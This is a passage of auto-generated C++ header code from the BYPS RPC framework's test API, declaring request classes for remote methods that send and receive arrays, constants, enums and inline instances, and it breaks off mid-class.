namespace byps { namespace test { namespace api { namespace remote {
using namespace ::byps;
class BRequest_RemoteArrayTypes23_sendArraysInt : public BMethodRequest {
public: PArray2Int arr2;
public: PArray3Int arr3;
public: PArray4Int arr4;
// checkpoint byps.gen.cpp.GenApiClass:504
public: BRequest_RemoteArrayTypes23_sendArraysInt();
// checkpoint byps.gen.cpp.GenApiClass:551
public: BRequest_RemoteArrayTypes23_sendArraysInt(const PArray2Int& arr2, const PArray3Int& arr3, const PArray4Int& arr4);
public: virtual BTYPEID BSerializable_getTypeId();
// checkpoint byps.gen.cpp.GenApiClass:886
public: void serialize(BIO& ar, const BVERSION version);
public: virtual void execute(const PRemote& __byps__remote, PAsyncResult __byps__asyncResult);
};
}}}}
// checkpoint byps.gen.cpp.GenApiClass:668
//-------------------------------------------------
// BRequest_RemoteArrayTypes23_sendArraysObject
// typeId=1306614381
namespace byps { namespace test { namespace api { namespace remote {
using namespace ::byps;
class BRequest_RemoteArrayTypes23_sendArraysObject : public BMethodRequest {
public: byps::PArray2Object arr2;
public: byps::PArray3Object arr3;
public: byps::PArray4Object arr4;
// checkpoint byps.gen.cpp.GenApiClass:504
public: BRequest_RemoteArrayTypes23_sendArraysObject();
// checkpoint byps.gen.cpp.GenApiClass:551
public: BRequest_RemoteArrayTypes23_sendArraysObject(const byps::PArray2Object& arr2, const byps::PArray3Object& arr3, const byps::PArray4Object& arr4);
public: virtual BTYPEID BSerializable_getTypeId();
// checkpoint byps.gen.cpp.GenApiClass:886
public: void serialize(BIO& ar, const BVERSION version);
public: virtual void execute(const PRemote& __byps__remote, PAsyncResult __byps__asyncResult);
};
}}}}
// checkpoint byps.gen.cpp.GenApiClass:668
//-------------------------------------------------
// BRequest_RemoteArrayTypes23_sendArraysString
// typeId=1175231899
namespace byps { namespace test { namespace api { namespace remote {
using namespace ::byps;
class BRequest_RemoteArrayTypes23_sendArraysString : public BMethodRequest {
public: PArray2String arr2;
public: PArray3String arr3;
public: PArray4String arr4;
// checkpoint byps.gen.cpp.GenApiClass:504
public: BRequest_RemoteArrayTypes23_sendArraysString();
// checkpoint byps.gen.cpp.GenApiClass:551
public: BRequest_RemoteArrayTypes23_sendArraysString(const PArray2String& arr2, const PArray3String& arr3, const PArray4String& arr4);
public: virtual BTYPEID BSerializable_getTypeId();
// checkpoint byps.gen.cpp.GenApiClass:886
public: void serialize(BIO& ar, const BVERSION version);
public: virtual void execute(const PRemote& __byps__remote, PAsyncResult __byps__asyncResult);
};
}}}}
// checkpoint byps.gen.cpp.GenApiClass:668
//-------------------------------------------------
// BRequest_RemoteArrayTypes4dim_getBool
// typeId=1874302495
namespace byps { namespace test { namespace api { namespace remote {
using namespace ::byps;
class BRequest_RemoteArrayTypes4dim_getBool : public BMethodRequest {
// checkpoint byps.gen.cpp.GenApiClass:504
public: BRequest_RemoteArrayTypes4dim_getBool();
public: virtual BTYPEID BSerializable_getTypeId();
// checkpoint byps.gen.cpp.GenApiClass:886
public: void serialize(BIO& ar, const BVERSION version);
public: virtual void execute(const PRemote& __byps__remote, PAsyncResult __byps__asyncResult);
};
}}}}
// checkpoint byps.gen.cpp.GenApiClass:668
//-------------------------------------------------
// BRequest_RemoteArrayTypes4dim_getByte
// typeId=1874292737
namespace byps { namespace test { namespace api { namespace remote {
using namespace ::byps;
class BRequest_RemoteArrayTypes4dim_getByte : public BMethodRequest {
// checkpoint byps.gen.cpp.GenApiClass:504
public: BRequest_RemoteArrayTypes4dim_getByte();
public: virtual BTYPEID BSerializable_getTypeId();
// checkpoint byps.gen.cpp.GenApiClass:886
public: void serialize(BIO& ar, const BVERSION version);
public: virtual void execute(const PRemote& __byps__remote, PAsyncResult __byps__asyncResult);
};
}}}}
// checkpoint byps.gen.cpp.GenApiClass:668
//-------------------------------------------------
// BRequest_RemoteArrayTypes4dim_getChar
// typeId=1874279859
namespace byps { namespace test { namespace api { namespace remote {
using namespace ::byps;
class BRequest_RemoteArrayTypes4dim_getChar : public BMethodRequest {
// checkpoint byps.gen.cpp.GenApiClass:504
public: BRequest_RemoteArrayTypes4dim_getChar();
public: virtual BTYPEID BSerializable_getTypeId();
// checkpoint byps.gen.cpp.GenApiClass:886
public: void serialize(BIO& ar, const BVERSION version);
public: virtual void execute(const PRemote& __byps__remote, PAsyncResult __byps__asyncResult);
};
}}}}
// checkpoint byps.gen.cpp.GenApiClass:668
//-------------------------------------------------
// BRequest_RemoteArrayTypes4dim_getDate
// typeId=1874256219
namespace byps { namespace test { namespace api { namespace remote {
using namespace ::byps;
class BRequest_RemoteArrayTypes4dim_getDate : public BMethodRequest {
// checkpoint byps.gen.cpp.GenApiClass:504
public: BRequest_RemoteArrayTypes4dim_getDate();
public: virtual BTYPEID BSerializable_getTypeId();
// checkpoint byps.gen.cpp.GenApiClass:886
public: void serialize(BIO& ar, const BVERSION version);
public: virtual void execute(const PRemote& __byps__remote, PAsyncResult __byps__asyncResult);
};
}}}}
// checkpoint byps.gen.cpp.GenApiClass:668
//-------------------------------------------------
// BRequest_RemoteArrayTypes4dim_getDouble
// typeId=1555969784
namespace byps { namespace test { namespace api { namespace remote {
using namespace ::byps;
class BRequest_RemoteArrayTypes4dim_getDouble : public BMethodRequest {
// checkpoint byps.gen.cpp.GenApiClass:504
public: BRequest_RemoteArrayTypes4dim_getDouble();
public: virtual BTYPEID BSerializable_getTypeId();
// checkpoint byps.gen.cpp.GenApiClass:886
public: void serialize(BIO& ar, const BVERSION version);
public: virtual void execute(const PRemote& __byps__remote, PAsyncResult __byps__asyncResult);
};
}}}}
// checkpoint byps.gen.cpp.GenApiClass:668
//-------------------------------------------------
// BRequest_RemoteArrayTypes4dim_getFloat
// typeId=2029769285
namespace byps { namespace test { namespace api { namespace remote {
using namespace ::byps;
class BRequest_RemoteArrayTypes4dim_getFloat : public BMethodRequest {
// checkpoint byps.gen.cpp.GenApiClass:504
public: BRequest_RemoteArrayTypes4dim_getFloat();
public: virtual BTYPEID BSerializable_getTypeId();
// checkpoint byps.gen.cpp.GenApiClass:886
public: void serialize(BIO& ar, const BVERSION version);
public: virtual void execute(const PRemote& __byps__remote, PAsyncResult __byps__asyncResult);
};
}}}}
// checkpoint byps.gen.cpp.GenApiClass:668
//-------------------------------------------------
// BRequest_RemoteArrayTypes4dim_getInt
// typeId=1325018648
namespace byps { namespace test { namespace api { namespace remote {
using namespace ::byps;
class BRequest_RemoteArrayTypes4dim_getInt : public BMethodRequest {
// checkpoint byps.gen.cpp.GenApiClass:504
public: BRequest_RemoteArrayTypes4dim_getInt();
public: virtual BTYPEID BSerializable_getTypeId();
// checkpoint byps.gen.cpp.GenApiClass:886
public: void serialize(BIO& ar, const BVERSION version);
public: virtual void execute(const PRemote& __byps__remote, PAsyncResult __byps__asyncResult);
};
}}}}
// checkpoint byps.gen.cpp.GenApiClass:668
//-------------------------------------------------
// BRequest_RemoteArrayTypes4dim_getLong
// typeId=1874004621
namespace byps { namespace test { namespace api { namespace remote {
using namespace ::byps;
class BRequest_RemoteArrayTypes4dim_getLong : public BMethodRequest {
// checkpoint byps.gen.cpp.GenApiClass:504
public: BRequest_RemoteArrayTypes4dim_getLong();
public: virtual BTYPEID BSerializable_getTypeId();
// checkpoint byps.gen.cpp.GenApiClass:886
public: void serialize(BIO& ar, const BVERSION version);
public: virtual void execute(const PRemote& __byps__remote, PAsyncResult __byps__asyncResult);
};
}}}}
// checkpoint byps.gen.cpp.GenApiClass:668
//-------------------------------------------------
// BRequest_RemoteArrayTypes4dim_getObject
// typeId=1253379978
namespace byps { namespace test { namespace api { namespace remote {
using namespace ::byps;
class BRequest_RemoteArrayTypes4dim_getObject : public BMethodRequest {
// checkpoint byps.gen.cpp.GenApiClass:504
public: BRequest_RemoteArrayTypes4dim_getObject();
public: virtual BTYPEID BSerializable_getTypeId();
// checkpoint byps.gen.cpp.GenApiClass:886
public: void serialize(BIO& ar, const BVERSION version);
public: virtual void execute(const PRemote& __byps__remote, PAsyncResult __byps__asyncResult);
};
}}}}
// checkpoint byps.gen.cpp.GenApiClass:668
//-------------------------------------------------
// BRequest_RemoteArrayTypes4dim_getPrimitiveTypes
// typeId=483228169
namespace byps { namespace test { namespace api { namespace remote {
using namespace ::byps;
class BRequest_RemoteArrayTypes4dim_getPrimitiveTypes : public BMethodRequest {
// checkpoint byps.gen.cpp.GenApiClass:504
public: BRequest_RemoteArrayTypes4dim_getPrimitiveTypes();
public: virtual BTYPEID BSerializable_getTypeId();
// checkpoint byps.gen.cpp.GenApiClass:886
public: void serialize(BIO& ar, const BVERSION version);
public: virtual void execute(const PRemote& __byps__remote, PAsyncResult __byps__asyncResult);
};
}}}}
// checkpoint byps.gen.cpp.GenApiClass:668
//-------------------------------------------------
// BRequest_RemoteArrayTypes4dim_getShort
// typeId=2041656421
namespace byps { namespace test { namespace api { namespace remote {
using namespace ::byps;
class BRequest_RemoteArrayTypes4dim_getShort : public BMethodRequest {
// checkpoint byps.gen.cpp.GenApiClass:504
public: BRequest_RemoteArrayTypes4dim_getShort();
public: virtual BTYPEID BSerializable_getTypeId();
// checkpoint byps.gen.cpp.GenApiClass:886
public: void serialize(BIO& ar, const BVERSION version);
public: virtual void execute(const PRemote& __byps__remote, PAsyncResult __byps__asyncResult);
};
}}}}
// checkpoint byps.gen.cpp.GenApiClass:668
//-------------------------------------------------
// BRequest_RemoteArrayTypes4dim_getString
// typeId=1121997496
namespace byps { namespace test { namespace api { namespace remote {
using namespace ::byps;
class BRequest_RemoteArrayTypes4dim_getString : public BMethodRequest {
// checkpoint byps.gen.cpp.GenApiClass:504
public: BRequest_RemoteArrayTypes4dim_getString();
public: virtual BTYPEID BSerializable_getTypeId();
// checkpoint byps.gen.cpp.GenApiClass:886
public: void serialize(BIO& ar, const BVERSION version);
public: virtual void execute(const PRemote& __byps__remote, PAsyncResult __byps__asyncResult);
};
}}}}
// checkpoint byps.gen.cpp.GenApiClass:668
//-------------------------------------------------
// BRequest_RemoteArrayTypes4dim_setBool
// typeId=185807085
namespace byps { namespace test { namespace api { namespace remote {
using namespace ::byps;
class BRequest_RemoteArrayTypes4dim_setBool : public BMethodRequest {
public: PArray4Boolean v;
// checkpoint byps.gen.cpp.GenApiClass:504
public: BRequest_RemoteArrayTypes4dim_setBool();
// checkpoint byps.gen.cpp.GenApiClass:551
public: BRequest_RemoteArrayTypes4dim_setBool(const PArray4Boolean& v);
public: virtual BTYPEID BSerializable_getTypeId();
// checkpoint byps.gen.cpp.GenApiClass:886
public: void serialize(BIO& ar, const BVERSION version);
public: virtual void execute(const PRemote& __byps__remote, PAsyncResult __byps__asyncResult);
};
}}}}
// checkpoint byps.gen.cpp.GenApiClass:668
//-------------------------------------------------
// BRequest_RemoteArrayTypes4dim_setByte
// typeId=185816843
namespace byps { namespace test { namespace api { namespace remote {
using namespace ::byps;
class BRequest_RemoteArrayTypes4dim_setByte : public BMethodRequest {
public: PArray4Byte v;
// checkpoint byps.gen.cpp.GenApiClass:504
public: BRequest_RemoteArrayTypes4dim_setByte();
// checkpoint byps.gen.cpp.GenApiClass:551
public: BRequest_RemoteArrayTypes4dim_setByte(const PArray4Byte& v);
public: virtual BTYPEID BSerializable_getTypeId();
// checkpoint byps.gen.cpp.GenApiClass:886
public: void serialize(BIO& ar, const BVERSION version);
public: virtual void execute(const PRemote& __byps__remote, PAsyncResult __byps__asyncResult);
};
}}}}
// checkpoint byps.gen.cpp.GenApiClass:668
//-------------------------------------------------
// BRequest_RemoteArrayTypes4dim_setChar
// typeId=185829721
namespace byps { namespace test { namespace api { namespace remote {
using namespace ::byps;
class BRequest_RemoteArrayTypes4dim_setChar : public BMethodRequest {
public: PArray4Char v;
// checkpoint byps.gen.cpp.GenApiClass:504
public: BRequest_RemoteArrayTypes4dim_setChar();
// checkpoint byps.gen.cpp.GenApiClass:551
public: BRequest_RemoteArrayTypes4dim_setChar(const PArray4Char& v);
public: virtual BTYPEID BSerializable_getTypeId();
// checkpoint byps.gen.cpp.GenApiClass:886
public: void serialize(BIO& ar, const BVERSION version);
public: virtual void execute(const PRemote& __byps__remote, PAsyncResult __byps__asyncResult);
};
}}}}
// checkpoint byps.gen.cpp.GenApiClass:668
//-------------------------------------------------
// BRequest_RemoteArrayTypes4dim_setDate
// typeId=185853361
namespace byps { namespace test { namespace api { namespace remote {
using namespace ::byps;
class BRequest_RemoteArrayTypes4dim_setDate : public BMethodRequest {
public: PArray4Date v;
// checkpoint byps.gen.cpp.GenApiClass:504
public: BRequest_RemoteArrayTypes4dim_setDate();
// checkpoint byps.gen.cpp.GenApiClass:551
public: BRequest_RemoteArrayTypes4dim_setDate(const PArray4Date& v);
public: virtual BTYPEID BSerializable_getTypeId();
// checkpoint byps.gen.cpp.GenApiClass:886
public: void serialize(BIO& ar, const BVERSION version);
public: virtual void execute(const PRemote& __byps__remote, PAsyncResult __byps__asyncResult);
};
}}}}
// checkpoint byps.gen.cpp.GenApiClass:668
//-------------------------------------------------
// BRequest_RemoteArrayTypes4dim_setDouble
// typeId=1770586860
namespace byps { namespace test { namespace api { namespace remote {
using namespace ::byps;
class BRequest_RemoteArrayTypes4dim_setDouble : public BMethodRequest {
public: PArray4Double v;
// checkpoint byps.gen.cpp.GenApiClass:504
public: BRequest_RemoteArrayTypes4dim_setDouble();
// checkpoint byps.gen.cpp.GenApiClass:551
public: BRequest_RemoteArrayTypes4dim_setDouble(const PArray4Double& v);
public: virtual BTYPEID BSerializable_getTypeId();
// checkpoint byps.gen.cpp.GenApiClass:886
public: void serialize(BIO& ar, const BVERSION version);
public: virtual void execute(const PRemote& __byps__remote, PAsyncResult __byps__asyncResult);
};
}}}}
// checkpoint byps.gen.cpp.GenApiClass:668
//-------------------------------------------------
// BRequest_RemoteArrayTypes4dim_setFloat
// typeId=1468656825
namespace byps { namespace test { namespace api { namespace remote {
using namespace ::byps;
class BRequest_RemoteArrayTypes4dim_setFloat : public BMethodRequest {
public: PArray4Float v;
// checkpoint byps.gen.cpp.GenApiClass:504
public: BRequest_RemoteArrayTypes4dim_setFloat();
// checkpoint byps.gen.cpp.GenApiClass:551
public: BRequest_RemoteArrayTypes4dim_setFloat(const PArray4Float& v);
public: virtual BTYPEID BSerializable_getTypeId();
// checkpoint byps.gen.cpp.GenApiClass:886
public: void serialize(BIO& ar, const BVERSION version);
public: virtual void execute(const PRemote& __byps__remote, PAsyncResult __byps__asyncResult);
};
}}}}
// checkpoint byps.gen.cpp.GenApiClass:668
//-------------------------------------------------
// BRequest_RemoteArrayTypes4dim_setInt
// typeId=1668568460
namespace byps { namespace test { namespace api { namespace remote {
using namespace ::byps;
class BRequest_RemoteArrayTypes4dim_setInt : public BMethodRequest {
public: PArray4Int v;
// checkpoint byps.gen.cpp.GenApiClass:504
public: BRequest_RemoteArrayTypes4dim_setInt();
// checkpoint byps.gen.cpp.GenApiClass:551
public: BRequest_RemoteArrayTypes4dim_setInt(const PArray4Int& v);
public: virtual BTYPEID BSerializable_getTypeId();
// checkpoint byps.gen.cpp.GenApiClass:886
public: void serialize(BIO& ar, const BVERSION version);
public: virtual void execute(const PRemote& __byps__remote, PAsyncResult __byps__asyncResult);
};
}}}}
// checkpoint byps.gen.cpp.GenApiClass:668
//-------------------------------------------------
// BRequest_RemoteArrayTypes4dim_setLong
// typeId=186104959
namespace byps { namespace test { namespace api { namespace remote {
using namespace ::byps;
class BRequest_RemoteArrayTypes4dim_setLong : public BMethodRequest {
public: PArray4Long v;
// checkpoint byps.gen.cpp.GenApiClass:504
public: BRequest_RemoteArrayTypes4dim_setLong();
// checkpoint byps.gen.cpp.GenApiClass:551
public: BRequest_RemoteArrayTypes4dim_setLong(const PArray4Long& v);
public: virtual BTYPEID BSerializable_getTypeId();
// checkpoint byps.gen.cpp.GenApiClass:886
public: void serialize(BIO& ar, const BVERSION version);
public: virtual void execute(const PRemote& __byps__remote, PAsyncResult __byps__asyncResult);
};
}}}}
// checkpoint byps.gen.cpp.GenApiClass:668
//-------------------------------------------------
// BRequest_RemoteArrayTypes4dim_setObject
// typeId=1467997054
namespace byps { namespace test { namespace api { namespace remote {
using namespace ::byps;
class BRequest_RemoteArrayTypes4dim_setObject : public BMethodRequest {
public: byps::PArray4Object v;
// checkpoint byps.gen.cpp.GenApiClass:504
public: BRequest_RemoteArrayTypes4dim_setObject();
// checkpoint byps.gen.cpp.GenApiClass:551
public: BRequest_RemoteArrayTypes4dim_setObject(const byps::PArray4Object& v);
public: virtual BTYPEID BSerializable_getTypeId();
// checkpoint byps.gen.cpp.GenApiClass:886
public: void serialize(BIO& ar, const BVERSION version);
public: virtual void execute(const PRemote& __byps__remote, PAsyncResult __byps__asyncResult);
};
}}}}
// checkpoint byps.gen.cpp.GenApiClass:668
//-------------------------------------------------
// BRequest_RemoteArrayTypes4dim_setPrimitiveTypes
// typeId=456924651
namespace byps { namespace test { namespace api { namespace remote {
using namespace ::byps;
class BRequest_RemoteArrayTypes4dim_setPrimitiveTypes : public BMethodRequest {
public: byps::test::api::prim::PArray4PrimitiveTypes v;
// checkpoint byps.gen.cpp.GenApiClass:504
public: BRequest_RemoteArrayTypes4dim_setPrimitiveTypes();
// checkpoint byps.gen.cpp.GenApiClass:551
public: BRequest_RemoteArrayTypes4dim_setPrimitiveTypes(const byps::test::api::prim::PArray4PrimitiveTypes& v);
public: virtual BTYPEID BSerializable_getTypeId();
// checkpoint byps.gen.cpp.GenApiClass:886
public: void serialize(BIO& ar, const BVERSION version);
public: virtual void execute(const PRemote& __byps__remote, PAsyncResult __byps__asyncResult);
};
}}}}
// checkpoint byps.gen.cpp.GenApiClass:668
//-------------------------------------------------
// BRequest_RemoteArrayTypes4dim_setShort
// typeId=1480543961
namespace byps { namespace test { namespace api { namespace remote {
using namespace ::byps;
class BRequest_RemoteArrayTypes4dim_setShort : public BMethodRequest {
public: PArray4Short v;
// checkpoint byps.gen.cpp.GenApiClass:504
public: BRequest_RemoteArrayTypes4dim_setShort();
// checkpoint byps.gen.cpp.GenApiClass:551
public: BRequest_RemoteArrayTypes4dim_setShort(const PArray4Short& v);
public: virtual BTYPEID BSerializable_getTypeId();
// checkpoint byps.gen.cpp.GenApiClass:886
public: void serialize(BIO& ar, const BVERSION version);
public: virtual void execute(const PRemote& __byps__remote, PAsyncResult __byps__asyncResult);
};
}}}}
// checkpoint byps.gen.cpp.GenApiClass:668
//-------------------------------------------------
// BRequest_RemoteArrayTypes4dim_setString
// typeId=1336614572
namespace byps { namespace test { namespace api { namespace remote {
using namespace ::byps;
class BRequest_RemoteArrayTypes4dim_setString : public BMethodRequest {
public: PArray4String v;
// checkpoint byps.gen.cpp.GenApiClass:504
public: BRequest_RemoteArrayTypes4dim_setString();
// checkpoint byps.gen.cpp.GenApiClass:551
public: BRequest_RemoteArrayTypes4dim_setString(const PArray4String& v);
public: virtual BTYPEID BSerializable_getTypeId();
// checkpoint byps.gen.cpp.GenApiClass:886
public: void serialize(BIO& ar, const BVERSION version);
public: virtual void execute(const PRemote& __byps__remote, PAsyncResult __byps__asyncResult);
};
}}}}
// checkpoint byps.gen.cpp.GenApiClass:668
//-------------------------------------------------
// BRequest_RemoteConstants_compare_AllTypesC
// typeId=1609344203
namespace byps { namespace test { namespace api { namespace remote {
using namespace ::byps;
class BRequest_RemoteConstants_compare_AllTypesC : public BMethodRequest {
public: bool bool1s;
public: bool bool2s;
public: wchar_t char1s;
public: ::std::wstring stringNull;
public: wchar_t char2s;
public: int16_t short1s;
public: int32_t int1s;
public: int64_t long1s;
public: float float1s;
public: double double1s;
public: ::std::wstring string1s;
public: byps::test::api::cons::PAllTypesZ ALL;
public: PArrayInt arrInt;
public: PArray4Int arrInt4;
public: PArrayString arrStrings;
public: PArray4String arrStrings4;
public: byps::test::api::cons::PArray2AllTypesZ arrAll;
// checkpoint byps.gen.cpp.GenApiClass:504
public: BRequest_RemoteConstants_compare_AllTypesC();
// checkpoint byps.gen.cpp.GenApiClass:551
public: BRequest_RemoteConstants_compare_AllTypesC(bool bool1s, bool bool2s, wchar_t char1s, const ::std::wstring& stringNull, wchar_t char2s, int16_t short1s, int32_t int1s, int64_t long1s, float float1s, double double1s, const ::std::wstring& string1s, const byps::test::api::cons::PAllTypesZ& ALL, const PArrayInt& arrInt, const PArray4Int& arrInt4, const PArrayString& arrStrings, const PArray4String& arrStrings4, const byps::test::api::cons::PArray2AllTypesZ& arrAll);
public: virtual BTYPEID BSerializable_getTypeId();
// checkpoint byps.gen.cpp.GenApiClass:886
public: void serialize(BIO& ar, const BVERSION version);
public: virtual void execute(const PRemote& __byps__remote, PAsyncResult __byps__asyncResult);
};
}}}}
// checkpoint byps.gen.cpp.GenApiClass:668
//-------------------------------------------------
// BRequest_RemoteConstants_compare_HebrewC
// typeId=1711871378
namespace byps { namespace test { namespace api { namespace remote {
using namespace ::byps;
class BRequest_RemoteConstants_compare_HebrewC : public BMethodRequest {
public: byps::test::api::cons::PHebrewZ ALEPH;
public: byps::test::api::cons::PHebrewZ BETH;
// checkpoint byps.gen.cpp.GenApiClass:504
public: BRequest_RemoteConstants_compare_HebrewC();
// checkpoint byps.gen.cpp.GenApiClass:551
public: BRequest_RemoteConstants_compare_HebrewC(const byps::test::api::cons::PHebrewZ& ALEPH, const byps::test::api::cons::PHebrewZ& BETH);
public: virtual BTYPEID BSerializable_getTypeId();
// checkpoint byps.gen.cpp.GenApiClass:886
public: void serialize(BIO& ar, const BVERSION version);
public: virtual void execute(const PRemote& __byps__remote, PAsyncResult __byps__asyncResult);
};
}}}}
// checkpoint byps.gen.cpp.GenApiClass:668
//-------------------------------------------------
// BRequest_RemoteEnums_getPlanet
// typeId=6352043
namespace byps { namespace test { namespace api { namespace remote {
using namespace ::byps;
class BRequest_RemoteEnums_getPlanet : public BMethodRequest {
// checkpoint byps.gen.cpp.GenApiClass:504
public: BRequest_RemoteEnums_getPlanet();
public: virtual BTYPEID BSerializable_getTypeId();
// checkpoint byps.gen.cpp.GenApiClass:886
public: void serialize(BIO& ar, const BVERSION version);
public: virtual void execute(const PRemote& __byps__remote, PAsyncResult __byps__asyncResult);
};
}}}}
// checkpoint byps.gen.cpp.GenApiClass:668
//-------------------------------------------------
// BRequest_RemoteEnums_setPlanet
// typeId=220969119
namespace byps { namespace test { namespace api { namespace remote {
using namespace ::byps;
class BRequest_RemoteEnums_setPlanet : public BMethodRequest {
public: byps::test::api::enu::EnumPlanets planet;
// checkpoint byps.gen.cpp.GenApiClass:504
public: BRequest_RemoteEnums_setPlanet();
// checkpoint byps.gen.cpp.GenApiClass:551
public: BRequest_RemoteEnums_setPlanet(byps::test::api::enu::EnumPlanets planet);
public: virtual BTYPEID BSerializable_getTypeId();
// checkpoint byps.gen.cpp.GenApiClass:886
public: void serialize(BIO& ar, const BVERSION version);
public: virtual void execute(const PRemote& __byps__remote, PAsyncResult __byps__asyncResult);
};
}}}}
// checkpoint byps.gen.cpp.GenApiClass:668
//-------------------------------------------------
// BRequest_RemoteInlineInstance_getActor
// typeId=600892860
namespace byps { namespace test { namespace api { namespace remote {
using namespace ::byps;
class BRequest_RemoteInlineInstance_getActor : public BMethodRequest {
// checkpoint byps.gen.cpp.GenApiClass:504
public: BRequest_RemoteInlineInstance_getActor();
public: virtual BTYPEID BSerializable_getTypeId();
// checkpoint byps.gen.cpp.GenApiClass:886
public: void serialize(BIO& ar, const BVERSION version);
public: virtual void execute(const PRemote& __byps__remote, PAsyncResult __byps__asyncResult);
};
}}}}
// checkpoint byps.gen.cpp.GenApiClass:668
//-------------------------------------------------
// BRequest_RemoteInlineInstance_getPoint2DArray1dim
// typeId=188393247
namespace byps { namespace test { namespace api { namespace remote {
using namespace ::byps;
class BRequest_RemoteInlineInstance_getPoint2DArray1dim : public BMethodRequest {
// checkpoint byps.gen.cpp.GenApiClass:504
public: BRequest_RemoteInlineInstance_getPoint2DArray1dim();
public: virtual BTYPEID BSerializable_getTypeId();
// checkpoint byps.gen.cpp.GenApiClass:886
public: void serialize(BIO& ar, const BVERSION version);
public: virtual void execute(const PRemote& __byps__remote, PAsyncResult __byps__asyncResult);
};
}}}}
// checkpoint byps.gen.cpp.GenApiClass:668
//-------------------------------------------------
// BRequest_RemoteInlineInstance_getPoint2DArray4dim
// typeId=188482620
namespace byps { namespace test { namespace api { namespace remote {
using namespace ::byps;
class BRequest_RemoteInlineInstance_getPoint2DArray4dim : public BMethodRequest {
// checkpoint byps.gen.cpp.GenApiClass:504
public: BRequest_RemoteInlineInstance_getPoint2DArray4dim();
public: virtual BTYPEID BSerializable_getTypeId();
// checkpoint byps.gen.cpp.GenApiClass:886
public: void serialize(BIO& ar, const BVERSION version);
public: virtual void execute(const PRemote& __byps__remote, PAsyncResult __byps__asyncResult);
};
}}}}
// checkpoint byps.gen.cpp.GenApiClass:668
//-------------------------------------------------
// BRequest_RemoteInlineInstance_getPoint2DList
// typeId=1428313263
namespace byps { namespace test { namespace api { namespace remote {
using namespace ::byps;
class BRequest_RemoteInlineInstance_getPoint2DList : public BMethodRequest {
// checkpoint byps.gen.cpp.GenApiClass:504
public: BRequest_RemoteInlineInstance_getPoint2DList();
public: virtual BTYPEID BSerializable_getTypeId();
// checkpoint byps.gen.cpp.GenApiClass:886
public: void serialize(BIO& ar, const BVERSION version);
public: virtual void execute(const PRemote& __byps__remote, PAsyncResult __byps__asyncResult);
};
}}}}
// checkpoint byps.gen.cpp.GenApiClass:668
//-------------------------------------------------
// BRequest_RemoteInlineInstance_getPoint2DListList
// typeId=1650554387
namespace byps { namespace test { namespace api { namespace remote {
using namespace ::byps;
class BRequest_RemoteInlineInstance_getPoint2DListList : public BMethodRequest {
// checkpoint byps.gen.cpp.GenApiClass:504
public: BRequest_RemoteInlineInstance_getPoint2DListList();
public: virtual BTYPEID BSerializable_getTypeId();
// checkpoint byps.gen.cpp.GenApiClass:886
public: void serialize(BIO& ar, const BVERSION version);
public: virtual void execute(const PRemote& __byps__remote, PAsyncResult __byps__asyncResult);
};
}}}}
// checkpoint byps.gen.cpp.GenApiClass:668
//-------------------------------------------------
// BRequest_RemoteInlineInstance_getPoint2DMap
// typeId=646661333
namespace byps { namespace test { namespace api { namespace remote {
using namespace ::byps;
class BRequest_RemoteInlineInstance_getPoint2DMap : public BMethodRequest {
// checkpoint byps.gen.cpp.GenApiClass:504
public: BRequest_RemoteInlineInstance_getPoint2DMap();
public: virtual BTYPEID BSerializable_getTypeId();
// checkpoint byps.gen.cpp.GenApiClass:886
public: void serialize(BIO& ar, const BVERSION version);
public: virtual void execute(const PRemote& __byps__remote, PAsyncResult __byps__asyncResult);
};
}}}}
// checkpoint byps.gen.cpp.GenApiClass:668
//-------------------------------------------------
// BRequest_RemoteInlineInstance_setActor
// typeId=1162005320
namespace byps { namespace test { namespace api { namespace remote {
using namespace ::byps;
class BRequest_RemoteInlineInstance_setActor : public BMethodRequest {
public: byps::test::api::inl::PActor act;
// checkpoint byps.gen.cpp.GenApiClass:504
public: BRequest_RemoteInlineInstance_setActor();
// checkpoint byps.gen.cpp.GenApiClass:551
public: BRequest_RemoteInlineInstance_setActor(const byps::test::api::inl::PActor& act);
public: virtual BTYPEID BSerializable_getTypeId();
// checkpoint byps.gen.cpp.GenApiClass:886
public: void serialize(BIO& ar, const BVERSION version);
public: virtual void execute(const PRemote& __byps__remote, PAsyncResult __byps__asyncResult);
};
}}}}
// checkpoint byps.gen.cpp.GenApiClass:668
//-------------------------------------------------
// BRequest_RemoteInlineInstance_setPoint2DArray1dim
// typeId=1355334613
namespace byps { namespace test { namespace api { namespace remote {
using namespace ::byps;
class BRequest_RemoteInlineInstance_setPoint2DArray1dim : public BMethodRequest {
public: byps::test::api::inl::PArrayPoint2D pointArray;
// checkpoint byps.gen.cpp.GenApiClass:504
public: BRequest_RemoteInlineInstance_setPoint2DArray1dim();
// checkpoint byps.gen.cpp.GenApiClass:551
public: BRequest_RemoteInlineInstance_setPoint2DArray1dim(const byps::test::api::inl::PArrayPoint2D& pointArray);
public: virtual BTYPEID BSerializable_getTypeId();
// checkpoint byps.gen.cpp.GenApiClass:886
public: void serialize(BIO& ar, const BVERSION version);
public: virtual void execute(const PRemote& __byps__remote, PAsyncResult __byps__asyncResult);
};
}}}}
// checkpoint byps.gen.cpp.GenApiClass:668
//-------------------------------------------------
// BRequest_RemoteInlineInstance_setPoint2DArray4dim
// typeId=1355245240
namespace byps { namespace test { namespace api { namespace remote {
using namespace ::byps;
class BRequest_RemoteInlineInstance_setPoint2DArray4dim : public BMethodRequest {
public: byps::test::api::inl::PArray4Point2D pointArray;
// checkpoint byps.gen.cpp.GenApiClass:504
public: BRequest_RemoteInlineInstance_setPoint2DArray4dim();
// checkpoint byps.gen.cpp.GenApiClass:551
public: BRequest_RemoteInlineInstance_setPoint2DArray4dim(const byps::test::api::inl::PArray4Point2D& pointArray);
public: virtual BTYPEID BSerializable_getTypeId();
// checkpoint byps.gen.cpp.GenApiClass:886
public: void serialize(BIO& ar, const BVERSION version);
public: virtual void execute(const PRemote& __byps__remote, PAsyncResult __byps__asyncResult);
};
}}}}
// checkpoint byps.gen.cpp.GenApiClass:668
//-------------------------------------------------
// BRequest_RemoteInlineInstance_setPoint2DList
// typeId=343422941
namespace byps { namespace test { namespace api { namespace remote {
using namespace ::byps;
class BRequest_RemoteInlineInstance_setPoint2DList : public BMethodRequest {
public: byps::test::api::inl::PVectorPoint2D pointList;
// checkpoint byps.gen.cpp.GenApiClass:504
public: BRequest_RemoteInlineInstance_setPoint2DList();
// checkpoint byps.gen.cpp.GenApiClass:551
public: BRequest_RemoteInlineInstance_setPoint2DList(const byps::test::api::inl::PVectorPoint2D& pointList);
public: virtual BTYPEID BSerializable_getTypeId();
// checkpoint byps.gen.cpp.GenApiClass:886
public: void serialize(BIO& ar, const BVERSION version);
